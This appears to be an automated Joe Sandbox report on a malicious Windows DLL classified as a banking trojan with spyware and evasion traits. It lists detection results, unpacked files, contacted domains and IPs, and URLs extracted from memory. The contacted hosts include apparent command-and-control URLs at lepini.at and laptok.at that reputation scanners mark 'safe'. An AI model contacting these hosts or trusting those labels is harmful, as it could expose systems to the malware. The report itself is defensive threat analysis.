Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
NJPcHPuRcG.dll	16%	Virustotal		Browse

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
2.3.regsvr32.exe.4c3e4a0.2.unpack	100%	Avira	HEUR/AGEN.1132033	Download File
2.2.regsvr32.exe.2770000.1.unpack	100%	Avira	HEUR/AGEN.1108168	Download File
2.3.regsvr32.exe.4eb94a0.1.unpack	100%	Avira	HEUR/AGEN.1132033	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.mercadolivre.com.br/	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.merlin.com.pl/favicon.ico	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://www.dailymail.co.uk/	0%	URL Reputation	safe
http://constitution.org/usdeclar.txtC:	0%	Avira URL Cloud	safe
http://https://file://USER.ID%lu.exe/upd	0%	Avira URL Cloud	safe
http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0	0%	Avira URL Cloud	safe
http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w	0%	Avira URL Cloud	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://image.excite.co.jp/jp/favicon/lep.ico	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://%s.com	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://busca.igbusca.com.br//app/static/images/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.etmall.com.tw/favicon.ico	0%	URL Reputation	safe
http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm	0%	Avira URL Cloud	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://it.search.dada.net/favicon.ico	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://pesterbdd.com/images/Pester.png	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://search.hanafos.com/favicon.ico	0%	URL Reputation	safe
http://cgi.search.biglobe.ne.jp/favicon.ico	0%	Avira URL Cloud	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
http://www.abril.com.br/favicon.ico	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
https://contoso.com/Icon	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://search.msn.co.jp/results.aspx?q=	0%	URL Reputation	safe
http://buscar.ozu.es/	0%	Avira URL Cloud	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://busca.igbusca.com.br/	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://search.auction.co.kr/	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://busca.buscape.com.br/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://www.pchome.com.tw/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://browse.guardian.co.uk/favicon.ico	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://google.pchome.com.tw/	0%	URL Reputation	safe
http://www.ozu.es/favicon.ico	0%	Avira URL Cloud	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://search.yahoo.co.jp/favicon.ico	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.gmarket.co.kr/	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://searchresults.news.com.au/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://www.asharqalawsat.com/	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://search.yahoo.co.jp	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://buscador.terra.es/	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
contextual.media.net	23.210.250.97	true	false	high
tls13.taboola.map.fastly.net	151.101.1.44	true	false	unknown
hblg.media.net	23.210.250.97	true	false	high
c56.lepini.at	34.65.144.159	true	false	unknown
lg3.media.net	23.210.250.97	true	false	high
resolver1.opendns.com	208.67.222.222	true	false	high
api3.lepini.at	34.65.144.159	true	false	unknown
geolocation.onetrust.com	104.20.184.68	true	false	high
api10.laptok.at	34.65.144.159	true	false	unknown
www.msn.com	unknown	unknown	false	high
srtb.msn.com	unknown	unknown	false	high
img.img-taboola.com	unknown	unknown	true	unknown
web.vortex.data.msn.com	unknown	unknown	false	high
cvision.media.net	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3wW0f3/JdFGceR8/sN9tQwx3x3JWJ2dzvoaA_2F/7bnKlxAsYe/gSbjUWPJM3O0NeIou/EZHWrqNzUS0t/SJ53k6qr4k5/xiOJ1_2BbyKtK4/Tnf2QRNkKddPRNN_2Fkyp/65kWXGWip9M43opO/J4Nq71H0yPbyFLs/r9xzWAiWquka5b9cWG/7jyYbvLwX/YHG6XBsznTAJKxK3VHeE/SrFheeplHdah6LyL5hX/KC_2BG8oiks28NBuCaE6gf/tQuPh0	false	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://search.chol.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.mercadolivre.com.br/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.merlin.com.pl/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.de/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.mtv.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.nifty.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.dailymail.co.uk/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www3.fnac.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://buscar.ya.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://search.yahoo.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://constitution.org/usdeclar.txtC:	regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://https://file://USER.ID%lu.exe/upd	regsvr32.exe, 00000002.00000003.395542546.00000000042F0000.00000004.00000001.sdmp, regsvr32.exe, 00000002.00000002.448316370.0000000005400000.00000040.00000001.sdmp, powershell.exe, 00000019.00000003.401552845.000001BFEB270000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.sogou.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com/designers	explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	false		high
http://asp.usatoday.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://fr.search.yahoo.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://api3.lepini.at/api1/7SpKvNZQZWoR0wQKCmN1/KD_2BPey7M6A4sknzph/Ip3VpPOQqmnCvT_2B_2BK5/4r2K_2B3w	explorer.exe, 00000024.00000002.622432567.00000000053A0000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://rover.ebay.com	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://in.search.yahoo.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://img.shopzilla.com/shopzilla/shopzilla.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://search.ebay.in/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://image.excite.co.jp/jp/favicon/lep.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://nuget.org/nuget.exe	powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	false		high
http://www.galapagosdesign.com/DPlease	explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://%s.com	explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://msk.afisha.ru/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.zhongyicts.com.cn	explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	powershell.exe, 00000019.00000002.447413776.000001BFD2931000.00000004.00000001.sdmp	false		high
http://busca.igbusca.com.br//app/static/images/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.rediff.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.ya.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.etmall.com.tw/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://api10.laptok.at/api1/aE3Chvy15YwtGBM5c3w/ZiymrrSsY1vMIEeQ79sLxc/QkfYDB83GeV6h/wfm_2Fba/IxaOhm	explorer.exe, 00000024.00000000.435365866.000000000DC20000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://it.search.dada.net/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://pesterbdd.com/images/Pester.png	powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.google.ru/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://search.hanafos.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	false		high
http://cgi.search.biglobe.ne.jp/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.abril.com.br/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.daum.net/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
https://contoso.com/Icon	powershell.exe, 00000019.00000002.471289912.000001BFE2995000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.naver.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://search.msn.co.jp/results.aspx?q=	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.clarin.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://buscar.ozu.es/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://kr.search.yahoo.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://search.about.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://busca.igbusca.com.br/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.ask.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.priceminister.com/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
https://github.com/Pester/Pester	powershell.exe, 00000019.00000002.448560328.000001BFD2B40000.00000004.00000001.sdmp	false		high
http://www.cjmall.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://search.centrum.cz/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.carterandcone.coml	explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://suche.t-online.de/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.google.it/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://search.auction.co.kr/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.ceneo.pl/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.amazon.de/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://sads.myspace.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://busca.buscape.com.br/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.pchome.com.tw/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://browse.guardian.co.uk/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://google.pchome.com.tw/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://list.taobao.com/browse/search_visual.htm?n=15&q=	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.rambler.ru/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://uk.search.yahoo.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://espanol.search.yahoo.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.ozu.es/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://search.sify.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://openimage.interpark.com/interpark.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.ebay.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.gmarket.co.kr/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/bThe	explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.nifty.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://searchresults.news.com.au/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.google.si/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.google.cz/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.soso.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.univision.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://search.ebay.it/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://images.joins.com/ui_c/fvc_joins.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://www.asharqalawsat.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://busca.orange.es/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://cnweb.search.live.com/results.aspx?q=	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://auto.search.msn.com/response.asp?MT=	explorer.exe, 00000024.00000000.435967588.000000000F120000.00000002.00000001.sdmp	false		high
http://search.yahoo.co.jp	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.target.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high
http://buscador.terra.es/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	explorer.exe, 00000024.00000000.432689454.000000000BC30000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://search.orange.co.uk/favicon.ico	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.iask.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.tesco.com/	explorer.exe, 00000024.00000000.436253525.000000000F213000.00000002.00000001.sdmp	false		high

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
34.65.144.159	unknown	United States	139070	GOOGLE-AS-APGoogleAsiaPacificPteLtdSG	false
104.20.184.68	unknown	United States	13335	CLOUDFLARENETUS	false
151.101.1.44	unknown	United States	54113	FASTLYUS	false

General Information

Joe Sandbox Version:	31.0.0 Emerald
Analysis ID:	353243
Start date:	15.02.2021
Start time:	21:25:07
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 11m 38s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	NJPcHPuRcG.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	39
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal100.bank.troj.spyw.evad.winDLL@36/159@18/3
EGA Information:	Failed
HDC Information:	Successful, ratio: 22.6% (good quality ratio 21.4%) Quality average: 79.2% Quality standard deviation: 29.1%
HCA Information:	Successful, ratio: 99% Number of executed functions: 89 Number of non-executed functions: 224
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll
Warnings:	Show All Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information. Exclude process from analysis (whitelisted): taskhostw.exe, MpCmdRun.exe, BackgroundTransferHost.exe, ielowutil.exe, backgroundTaskHost.exe, SgrmBroker.exe, conhost.exe, WmiPrvSE.exe, svchost.exe Excluded IPs from analysis (whitelisted): 40.88.32.150, 104.43.139.144, 88.221.62.148, 131.253.33.203, 204.79.197.200, 13.107.21.200, 92.122.213.187, 92.122.213.231, 65.55.44.109, 23.210.250.97, 204.79.197.203, 23.210.248.85, 51.104.139.180, 152.199.19.161, 51.103.5.186, 93.184.221.240, 92.122.213.247, 92.122.213.194, 2.20.142.209, 2.20.142.210, 20.54.26.129, 52.155.217.156 Excluded domains from analysis (whitelisted): arc.msn.com.nsatc.net, fs-wildcard.microsoft.com.edgekey.net, e11290.dspg.akamaiedge.net, skypedataprdcoleus15.cloudapp.net, www-bing-com.dual-a-0001.a-msedge.net, audownload.windowsupdate.nsatc.net, hlb.apr-52dd2-0.edgecastdns.net, watson.telemetry.microsoft.com, au-bg-shim.trafficmanager.net, www.bing.com, fs.microsoft.com, dual-a-0001.a-msedge.net, cvision.media.net.edgekey.net, ris-prod.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, skypedataprdcolcus16.cloudapp.net, a1999.dscg2.akamai.net, web.vortex.data.trafficmanager.net, ris.api.iris.microsoft.com, blobcollector.events.data.trafficmanager.net, cs9.wpc.v0cdn.net, au.download.windowsupdate.com.edgesuite.net, a-0003.dc-msedge.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, wu.azureedge.net, iecvlist.microsoft.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, wns.notify.trafficmanager.net, go.microsoft.com, cs11.wpc.v0cdn.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, wu.wpc.apr-52dd2.edgecastdns.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, client.wns.windows.com, ie9comview.vo.msecnd.net, wu.ec.azureedge.net, a-0003.a-msedge.net, e1723.g.akamaiedge.net, ctldl.windowsupdate.com, www-msn-com.a-0003.a-msedge.net, a767.dscg3.akamai.net, e607.d.akamaiedge.net, web.vortex.data.microsoft.com, a-0001.a-afdentry.net.trafficmanager.net, icePrime.a-0003.dc-msedge.net, go.microsoft.com.edgekey.net, static-global-s-msn-com.akamaized.net, vip2-par02p.wns.notify.trafficmanager.net Report size exceeded maximum capacity and may have missing behavior information. Report size getting too big, too many NtDeviceIoControlFile calls found. Report size getting too big, too many NtOpenKeyEx calls found. Report size getting too big, too many NtProtectVirtualMemory calls found. Report size getting too big, too many NtQueryValueKey calls found. Report size getting too big, too many NtReadVirtualMemory calls found.

Simulations

Behavior and APIs

Time	Type	Description
21:27:01	API Interceptor	36x Sleep call for process: powershell.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
104.20.184.68	DUcKsYsyX0.dll	Get hash	malicious	Browse
	RI51uAIUyL.dll	Get hash	malicious	Browse
	Server.exe	Get hash	malicious	Browse
	mon48_cr.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Generic.mg.5db96940e68acc98.dll	Get hash	malicious	Browse
	Wh102yYa..dll	Get hash	malicious	Browse
	SecuriteInfo.com.Generic.mg.fac603176f7a6a20.dll	Get hash	malicious	Browse
	SecuriteInfo.com.Variant.Bulz.349310.24122.dll	Get hash	malicious	Browse
	acr1.dll	Get hash	malicious	Browse
	TRIGANOcr.dll	Get hash	malicious	Browse
	BullGuard.dll	Get hash	malicious	Browse
	Jidert.dll	Get hash	malicious	Browse
	Vu2QRHVR8C.dll	Get hash	malicious	Browse
	header[1].jpg.dll	Get hash	malicious	Browse
	SimpleAudio.dll	Get hash	malicious	Browse
	cSPuZxa7I4.dll	Get hash	malicious	Browse
	umAuo1QklZ.dll	Get hash	malicious	Browse
	A6C8E866.xlsx	Get hash	malicious	Browse
	UGPK60taH6.dll	Get hash	malicious	Browse
	usd2.dll	Get hash	malicious	Browse

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
tls13.taboola.map.fastly.net	DUcKsYsyX0.dll	Get hash	malicious	Browse	151.101.1.44
	RI51uAIUyL.dll	Get hash	malicious	Browse	151.101.1.44
